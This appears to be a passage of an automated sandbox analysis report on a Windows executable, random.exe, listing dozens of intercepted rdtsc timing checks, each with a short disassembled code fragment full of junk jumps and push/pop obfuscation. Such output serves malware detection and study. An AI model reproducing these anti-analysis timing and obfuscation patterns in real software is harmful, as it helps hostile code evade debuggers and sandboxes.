            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 815626 second address: 815630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 815630 second address: 815634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86997F second address: 8699A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F6B8D266C3Ch 0x0000000b jno 00007F6B8D266C36h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jmp 00007F6B8D266C43h 0x0000001b pop ebx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86D841 second address: 86D852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B8CF1119Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8699A9 second address: 869A18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007F6B8D266C36h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d clc 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+122D181Ah], ecx 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, edi 0x00000024 mov eax, dword ptr [ebp+122D13A9h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F6B8D266C38h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov ebx, 00E0CE38h 0x00000049 mov ebx, dword ptr [ebp+122D2942h] 0x0000004f push FFFFFFFFh 0x00000051 mov ebx, dword ptr [ebp+122D3C19h] 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F6B8D266C40h 0x0000005f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86D852 second address: 86D8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F6B8CF11198h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 call 00007F6B8CF111A7h 0x00000027 jno 00007F6B8CF1119Ch 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+1245942Ah], esi 0x00000036 pushad 0x00000037 mov al, D5h 0x00000039 push ebx 0x0000003a js 00007F6B8CF11196h 0x00000040 pop eax 0x00000041 popad 0x00000042 push 00000000h 0x00000044 mov ebx, dword ptr [ebp+122D17CFh] 0x0000004a push eax 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e jg 00007F6B8CF11196h 0x00000054 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 86D8C2 second address: 86D8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 875409 second address: 87540E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 875798 second address: 8757B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6B8D266C41h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8757B0 second address: 8757B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 87A24A second address: 87A24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8080F9 second address: 808114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A5h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88167D second address: 881681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 881681 second address: 8816AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B8CF11196h 0x00000008 jmp 00007F6B8CF1119Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B8CF111A1h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8816AD second address: 8816B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 885D59 second address: 885D60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 886401 second address: 88643D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6B8D266C36h 0x0000000a jnl 00007F6B8D266C36h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F6B8D266C3Ah 0x00000017 jc 00007F6B8D266C36h 0x0000001d jmp 00007F6B8D266C48h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8866EA second address: 886728 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6B8CF111A7h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F6B8CF1119Fh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F6B8CF111A3h 0x00000017 pushad 0x00000018 js 00007F6B8CF11196h 0x0000001e jno 00007F6B8CF11196h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 886864 second address: 886889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F6B8D266C3Eh 0x0000000b ja 00007F6B8D266C36h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop ecx 0x00000014 push ebx 0x00000015 jmp 00007F6B8D266C3Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8869B3 second address: 8869B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8869B7 second address: 8869C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6B8D266C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8869C1 second address: 8869CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6B8CF11196h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 886B15 second address: 886B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F6B8D266C49h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 886C54 second address: 886C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6B8CF11196h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 886C5E second address: 886C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 885A39 second address: 885A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 885A3D second address: 885A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6B8D266C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6B8D266C3Ch 0x00000011 pushad 0x00000012 jmp 00007F6B8D266C42h 0x00000017 pushad 0x00000018 popad 0x00000019 jng 00007F6B8D266C36h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 888D64 second address: 888D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F6B8CF11196h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88D110 second address: 88D11A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B8D266C3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88BF06 second address: 88BF0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88BF0C second address: 88BF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6B8D266C45h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88BF29 second address: 88BF33 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6B8CF11196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88BF33 second address: 88BF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88BF3C second address: 88BF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF111A9h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F6B8CF11196h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 84FFBB second address: 83438F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cx, bx 0x0000000d lea eax, dword ptr [ebp+12480D2Fh] 0x00000013 mov edx, dword ptr [ebp+122D38F1h] 0x00000019 push eax 0x0000001a jmp 00007F6B8D266C43h 0x0000001f mov dword ptr [esp], eax 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007F6B8D266C38h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c mov cx, si 0x0000003f je 00007F6B8D266C36h 0x00000045 call dword ptr [ebp+122D28D9h] 0x0000004b pushad 0x0000004c pushad 0x0000004d jc 00007F6B8D266C36h 0x00000053 jmp 00007F6B8D266C3Ah 0x00000058 popad 0x00000059 jp 00007F6B8D266C42h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8500D1 second address: 8500D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8500D7 second address: 8500EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6B8D266C3Ah 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 850491 second address: 8504A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F6B8CF11196h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8504A3 second address: 8504A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8508C2 second address: 8508C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 85098E second address: 85099C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6B8D266C36h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 850F42 second address: 850F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8512A3 second address: 8512AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6B8D266C36h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C504 second address: 88C524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C6A8 second address: 88C6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C6AE second address: 88C6D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F6B8CF11196h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C6D0 second address: 88C6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C6D4 second address: 88C6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C6D8 second address: 88C6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C83F second address: 88C844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88C99B second address: 88C9C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8D266C41h 0x00000009 pop esi 0x0000000a push edi 0x0000000b jmp 00007F6B8D266C43h 0x00000010 pop edi 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 88CCAC second address: 88CCC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6B8CF111A3h 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 893C17 second address: 893C21 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B8D266C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 899DB4 second address: 899DC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 899DC3 second address: 899DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 898A54 second address: 898A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 898A5B second address: 898A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 899163 second address: 899169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 899169 second address: 89918F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6B8D266C44h 0x0000000f jp 00007F6B8D266C36h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 899640 second address: 899666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF111A6h 0x00000009 popad 0x0000000a pop edi 0x0000000b jg 00007F6B8CF111B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 899666 second address: 899677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 89CAB5 second address: 89CAEA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6B8CF111A9h 0x00000008 pop ebx 0x00000009 jmp 00007F6B8CF1119Fh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 89CAEA second address: 89CB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8D266C3Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d jmp 00007F6B8D266C41h 0x00000012 jl 00007F6B8D266C36h 0x00000018 pop edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 89CB15 second address: 89CB2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF1119Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F6B8CF11196h 0x0000000f jng 00007F6B8CF11196h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 89CB2F second address: 89CB39 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B8D266C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 89C7FF second address: 89C804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 89E261 second address: 89E267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 89E267 second address: 89E280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8CF111A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A0110 second address: 8A012A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F6B8D266C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 jl 00007F6B8D266C3Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A0288 second address: 8A0290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A0290 second address: 8A029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jo 00007F6B8D266C36h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A029F second address: 8A0306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B8CF111A6h 0x00000008 jmp 00007F6B8CF111A2h 0x0000000d jbe 00007F6B8CF11196h 0x00000013 popad 0x00000014 jmp 00007F6B8CF111A9h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007F6B8CF1119Eh 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 jg 00007F6B8CF11196h 0x0000002c pop edx 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A0306 second address: 8A0311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A74BA second address: 8A74D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF1119Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A74D2 second address: 8A74D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A74D6 second address: 8A74DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A5EF8 second address: 8A5EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A6092 second address: 8A6098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A6098 second address: 8A609D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A609D second address: 8A60A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6B8CF11196h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8A6355 second address: 8A638D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B8D266C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6B8D266C40h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B8D266C42h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 850CC3 second address: 850CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B8CF111A4h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 850CE3 second address: 850CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 850D7F second address: 850DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 cmc 0x0000000a push 00000004h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F6B8CF11198h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sbb cl, 00000035h 0x00000029 nop 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 850DB1 second address: 850DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AC872 second address: 8AC878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8ABE76 second address: 8ABE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AC3BD second address: 8AC3DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F6B8CF111A9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 8AF682 second address: 8AF688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
